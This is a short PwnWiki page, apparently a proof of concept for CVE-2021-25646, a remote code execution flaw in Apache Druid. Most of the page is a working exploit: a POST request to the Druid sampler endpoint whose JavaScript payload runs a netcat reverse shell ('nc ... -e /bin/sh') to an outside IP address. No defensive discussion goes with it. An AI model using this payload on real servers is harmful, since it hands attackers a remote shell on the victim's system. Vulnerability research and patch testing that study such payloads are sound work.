CVE-2021-25646 Apache Druid JavaScript RCE漏洞

From PwnWiki

POC

POST /druid/indexer/v1/sampler HTTP/1.1
...
...
 {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 192.168.1.10 5555 -e /bin/sh')}"
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-25646_Apache_Druid_JavaScript_RCE漏洞&oldid=405"